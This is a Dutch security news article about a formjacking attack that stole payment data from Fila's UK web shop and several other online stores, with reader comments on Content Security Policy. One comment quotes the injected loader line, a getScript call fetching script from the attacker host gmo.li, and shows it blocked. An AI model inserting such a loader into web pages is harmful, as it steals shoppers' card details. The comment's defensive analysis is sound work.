image

Britse webwinkel kledingmerk Fila slachtoffer van formjacking

vrijdag 15 maart 2019, 10:36 door Redactie, 2 reacties

Aanvallers zijn erin geslaagd om in te breken op de Britse webwinkel van kledingmerk Fila en daar kwaadaardige code te injecteren die betaalgegevens van klanten onderschepte. Ook zes andere webwinkels werden slachtoffer van formjacking, zoals dergelijke aanvallen worden genoemd.

Bij formjacking wordt er kwaadaardige code aan de bestelpagina van een webshop toegevoegd die creditcardgegevens en andere klantdata naar de aanvallers doorstuurt. Volgens securitybedrijf Group-IB zou de kwaadaardige op de website van Fila.co.uk al sinds november vorig jaar actief zijn geweest. Sindsdien zijn de betaal- en privégegevens van mogelijk 5600 klanten gestolen, aldus de beveiliger.

Naast Fila werden ook de webshops van interieurwinkel Jung Lee NY, ongediertebestrijder Forshaw, cosmeticawinkel Absolute New York, online supermarkt Cajun Grocer, fitnesswinkel Get RXd en video-editingshop Safe Harbor het slachtoffer van formjacking. Onlangs meldde Symantec dat vorig jaar 4800 webwinkels per maand door formjacking werden getroffen. Fila heeft de code inmiddels van de eigen website verwijderd.

Om de kwaadaardige code op de betaalpagina van webwinkels te krijgen maken criminelen onder andere gebruik van third-party code die op een webwinkel draait. In andere gevallen wordt de webwinkel direct gehackt, waarna de kwaadaardige code aan de betaalpagina wordt toegevoegd. Dit gebeurt onder andere door standaardwachtwoorden, bruteforce-aanvallen en kwetsbaarheden in de webwinkelsoftware. Hoe de aanvallers toegang tot de webshop van Fila wisten te krijgen is onbekend.

Image

Reacties (2)
15-03-2019, 15:21 door foxonsafari
Geen HSTS met name "Content Security Policy" rules!
(Gecontroleerd met "CSP Evaluator" Chrome Store )
15-03-2019, 16:39 door foxonsafari
It is loading the script from gmo.li using a jQuery getScript call, so a properly constructed CSP would have blocked it. Tested using one of my own CSP protected sites. See result here:


$.getScript('http://gmo.li/js.php?r=008353')

Content Security Policy: The page’s settings blocked the loading of a resource at http://gmo.li/js.php?r=008353&_=1552623429549 (“default-src”).


Implementing CSP on someone else's code would be really tough.
Reageren

Deze posting is gelocked. Reageren is niet meer mogelijk.